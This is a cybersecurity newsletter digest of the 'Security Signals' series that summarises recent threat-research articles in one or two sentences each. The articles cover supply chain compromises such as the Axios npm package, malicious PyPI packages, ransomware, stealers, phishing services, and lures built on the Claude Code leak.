Welcome to your biweekly digest of curated cybersecurity intelligence.
Every two weeks, we bring you expert insights and handpicked articles covering the latest threats, threat actor activity, vulnerabilities, incident trends, and defensive strategies. Whether you’re on the front lines or shaping your organization’s security posture, Security Signals delivers the information you need to stay informed and ready.
For more articles, check out our #onpatrol4malware blog.
March 2026 Edition
Key stats from real-world telemetry and live attack observations over the past month – a concise look at what we’re seeing across malware, phishing, ransomware, C2s, and domain abuse.
This Edition’s Articles
Early April 2026 Cyber Threat Reports spotlights a fast-changing threat landscape shaped by Medusa ransomware activity, Axios and PyPI supply chain compromises, EvilTokens-driven BEC fraud, and malware campaigns abusing Claude Code, SaaS notifications, and Kubernetes exposure. This roundup reflects how quickly attackers are scaling social engineering, open-source compromise, credential theft, and cloud-focused intrusion techniques across real-world environments.
AppsFlyer Supply Chain Attack Analysis
Source: Reflectiz
(Published: 26 March 2026)
Researchers uncovered a supply chain attack targeting AppsFlyer, where malicious code was injected into third-party integrations to compromise downstream users. Read more.
Axios NPM Package Compromised: Supply Chain Attack Hits JavaScript HTTP Client
Source: Trend Micro
(Published: 28 March 2026)
A compromised Axios npm package introduced malicious code into a widely used JavaScript HTTP client, impacting downstream applications and developers. Read more.
The Axios Breach: When NPM Trust Becomes an APT Attack Vector
Source: PolySwarm
(Published: 31 March 2026)
The Axios compromise demonstrates how trusted open-source packages can be weaponized as advanced persistent threat vectors within software supply chains. Read more.
EvilTokens: An AI-Augmented Phishing-as-a-Service for Automating BEC Fraud (Part 2)
Source: Sekoia
(Published: 01 April 2026)
EvilTokens is an AI-augmented phishing-as-a-service platform designed to automate business email compromise attacks and streamline credential harvesting operations. Read more.
BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product
Source: CyberSec Sentinel
(Published: 01 April 2026)
Threat actors are increasingly leveraging bring-your-own-vulnerable-driver techniques to bypass endpoint detection and response solutions across major security platforms. Read more.
Supply Chain Attacks Surge in March 2026
Source: Zscaler
(Published: 01 April 2026)
Researchers observed a significant increase in supply chain attacks throughout March 2026, targeting open-source ecosystems and developer pipelines. Read more.
ClickFix Detection With YARA Rules
Source: ReversingLabs
(Published: 01 April 2026)
ReversingLabs developed YARA-based detection techniques to identify ClickFix-related malware activity across compromised systems. Read more.
NightSpire Ransomware Analysis
Source: Huntress
(Published: 02 April 2026)
NightSpire ransomware has emerged as a new threat, using multi-stage execution and stealthy techniques to evade detection and encrypt victim systems. Read more.
CrystalX RAT With Prankware Features
Source: Kaspersky Securelist
(Published: 02 April 2026)
Researchers identified CrystalX RAT, a remote access trojan that combines espionage capabilities with disruptive prankware features targeting victims. Read more.
Iran, US, and Israel Cyberwar Analysis 2026
Source: Seqrite
(Published: 02 April 2026)
Analysts highlight escalating cyber conflict activity involving Iran, the United States, and Israel, with increased targeting of critical infrastructure and government entities. Read more.
The Axios Breach: Plain Crypto JS Compromises Packages
Source: Resecurity
(Published: 02 April 2026)
A supply chain malware incident involving compromised crypto libraries demonstrates how attackers can poison widely used packages to distribute malicious code. Read more.
Hermes PyPI Package Analysis
Source: JFrog Security Research
(Published: 02 April 2026)
JFrog researchers analyzed a malicious PyPI package named Hermes that steals sensitive data from AI-related workflows and developer environments. Read more.
A Technique-Based Approach to Hunting Web-Delivered Malware
Source: Censys
(Published: 02 April 2026)
Researchers outline a technique-driven methodology for detecting and tracking malware delivered via web-based attack chains. Read more.
Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads
Source: Trend Micro
(Published: 03 April 2026)
A packaging error in Anthropic’s Claude Code npm release briefly exposed internal source code, which threat actors rapidly weaponized to distribute Vidar and GhostSocks malware via fake GitHub repositories. Read more.
Weaponizing SaaS Notification Pipelines
Source: Cisco Talos
(Published: 03 April 2026)
Threat actors are abusing SaaS notification systems to deliver malicious payloads and bypass traditional security controls. Read more.
ComfyUI Servers Abused in Cryptomining Proxy Botnet
Source: Censys
(Published: 03 April 2026)
Exposed ComfyUI servers are being leveraged as part of a cryptomining proxy botnet, enabling attackers to route malicious traffic through compromised infrastructure. Read more.
Reddit and TradingView Lures Lead to Vidar and Amos Stealers
Source: HexaStrike
(Published: 03 April 2026)
Threat actors are using Reddit and TradingView-themed lures to distribute Vidar and Amos stealer malware to unsuspecting users. Read more.
Team PCP Strikes Again: Telnyx Library Supply Chain Compromise
Source: JFrog Security Research
(Published: 03 April 2026)
Threat actor Team PCP continues supply chain attacks by compromising a widely used Telnyx library to inject malicious functionality. Read more.
CIFRAT Malware Analysis
Source: CERT Polska
(Published: 03 April 2026)
CERT Polska analyzed CIFRAT malware, highlighting its modular design and capabilities for credential theft and remote control. Read more.
Axios Supply Chain Compromise: Detection and Response
Source: Elastic Security Labs
(Published: 03 April 2026)
Elastic provides detection strategies and telemetry insights for identifying malicious activity stemming from the Axios npm supply chain compromise. Read more.
The Scanner Was the Weapon: DevSecOps Supply Chain Attacks
Source: CloudSEK
(Published: 03 April 2026)
CloudSEK documents long-term supply chain attacks targeting DevSecOps infrastructure through malicious scanning tools and automation pipelines. Read more.
Contagious Interview Campaign Spreads Across 5 Ecosystems
Source: Socket
(Published: 04 April 2026)
The Contagious Interview campaign has expanded across multiple software ecosystems, distributing malicious packages designed to steal credentials and deploy backdoors. Read more.
Malicious Hermes PyPI Package Steals AI Conversation Data
Source: SafeDep
(Published: 04 April 2026)
A malicious PyPI package disguised as Hermes has been discovered stealing sensitive AI-generated conversation data from developers. Read more.
Modern Kubernetes Threat Landscape
Source: Unit 42 (Palo Alto Networks)
(Published: 04 April 2026)
Unit 42 outlines evolving threats targeting Kubernetes environments, including misconfigurations, exposed services, and supply chain vulnerabilities. Read more.
DPRK Malware: Modularity, Diversity, and Functional Specialization
Source: DomainTools
(Published: 04 April 2026)
Researchers detail how DPRK-linked malware ecosystems are evolving with modular architectures and specialized tooling for targeted campaigns. Read more.
Tax Season 2026: Cybercriminal Campaign Preparation
Source: Check Point
(Published: 04 April 2026)
Cybercriminals are preparing tax-themed phishing campaigns months in advance, leveraging seasonal lures to maximize victim engagement. Read more.
Tycoon 2FA Infrastructure Update Following Global Takedown
Source: eSentire
(Published: 04 April 2026)
Threat actors behind Tycoon 2FA phishing infrastructure have adapted their operations following disruption efforts by global law enforcement coalitions. Read more.
Anthropic Claude Code Leak: Security Implications
Source: Zscaler
(Published: 04 April 2026)
Zscaler analyzes the security risks introduced by the Claude Code leak and how attackers are leveraging it in active campaigns. Read more.
A Little Bit Pivoting: What Web Shells Are Attackers Looking For
Source: SANS ISC
(Published: 05 April 2026)
Attackers are actively scanning for specific web shells that enable lateral movement and pivoting within compromised environments. Read more.
Malicious Strapi Plugin Deploys Command-and-Control Agent
Source: SafeDep
(Published: 05 April 2026)
A malicious npm plugin targeting Strapi deployments installs a command-and-control agent to maintain persistence within compromised environments. Read more.
Qilin Ransomware EDR Killer Analysis
Source: Cisco Talos
(Published: 05 April 2026)
Cisco Talos examines how Qilin ransomware incorporates EDR-killing techniques to disable security defenses prior to encryption. Read more.
Fake Installers Deliver Monero Mining Malware
Source: Elastic Security Labs
(Published: 05 April 2026)
Elastic researchers identified campaigns distributing fake software installers that deploy Monero cryptomining malware on infected systems. Read more.
Axios NPM Supply Chain Compromise Analysis
Source: Datadog Security Labs
(Published: 05 April 2026)
Datadog researchers provide detailed analysis of the Axios npm compromise and its impact on developer ecosystems and production environments. Read more.
Storm-1175 Targets Vulnerable Web-Facing Assets in Medusa Ransomware Operations
Source: Microsoft
(Published: 06 April 2026)
Microsoft observed Storm-1175 conducting high-tempo ransomware operations by exploiting vulnerable internet-facing assets to deploy Medusa ransomware. Read more.
Business Email Compromise Fraud Becomes More Accessible
Source: Cisco Talos
(Published: 06 April 2026)
The democratization of business email compromise is lowering the barrier to entry, enabling more threat actors to launch sophisticated fraud campaigns. Read more.
Understanding the Axios NPM Compromise
Source: Endor Labs
(Published: 06 April 2026)
Endor Labs examines how the Axios compromise unfolded and what it reveals about modern supply chain attack techniques. Read more.
Phantom Stealer: Credential Theft Campaign Analysis
Source: Group-IB
(Published: 06 April 2026)
Phantom Stealer is being distributed through phishing campaigns to harvest credentials and sensitive user data across multiple platforms. Read more.
Claude Code Packaging Error Remains a Lure in an Active Campaign: What Defenders Should Do
Source: Trend Micro
(Published: 07 April 2026)
Threat actors continue to exploit the Claude Code packaging error as a lure, distributing Vidar, GhostSocks, and PureLog stealer malware through malicious GitHub releases. Read more.
Cybersecurity Advisory AA26-097A
Source: CISA
(Published: 07 April 2026)
CISA released advisory AA26-097A detailing ongoing threat activity and providing guidance for detecting and mitigating active cyber threats affecting organizations. Read more.
Mamont Banking Trojan: Android Malware Analysis
Source: NCC Group
(Published: 07 April 2026)
NCC Group analyzes Mamont, an Android banking trojan designed to steal financial data and credentials from infected mobile devices. Read more.
Want more articles? Check out the previous edition of Security Signals here.